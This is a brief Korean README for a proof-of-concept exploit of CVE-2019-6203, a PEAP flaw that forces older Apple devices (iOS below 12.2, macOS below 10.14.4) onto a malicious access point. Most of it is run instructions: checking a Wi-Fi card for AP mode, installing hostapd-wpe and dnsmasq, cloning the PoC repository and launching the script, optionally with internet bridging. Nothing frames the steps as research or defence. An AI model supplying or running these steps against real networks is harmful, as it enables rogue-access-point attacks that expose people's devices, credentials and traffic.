
CVE-2019-6203용 PoC로, iOS 12.2 미만, macOS 10.14.4 미만에서 작동합니다.
모든 Apple 기기에는 PEAP 버그가 존재하여, 공격자가 모든 Apple 기기(iOS, macOS 또는 tvOS)를 악의적인 액세스 포인트에 연결하도록 강제할 수 있습니다.
이것은 CVE-2019-6203에 대한 PoC이며, iOS 12.2 미만, macOS 10.14.4 미만에서 동작합니다. Kali Linux에서 테스트되었습니다.
이 PoC를 실행하려면 AP 모드를 지원하는 Wi-Fi 카드가 필요합니다. iw list를 실행하여 확인할 수 있으며, 출력은 다음과 같습니다:
Supported interface modes:
* IBSS
* managed
* AP
* AP/VLAN
* monitor
* mesh point
apt install hostapd-wpe dnsmasq
git clone https://github.com/qingxp9/CVE-2019-6203-PoC
cd CVE-2019-6203-PoC
python CVE-2019-6203-PoC.py -i wlan0
#with Internet
python CVE-2019-6203-PoC.py -i wlan0 -o eth0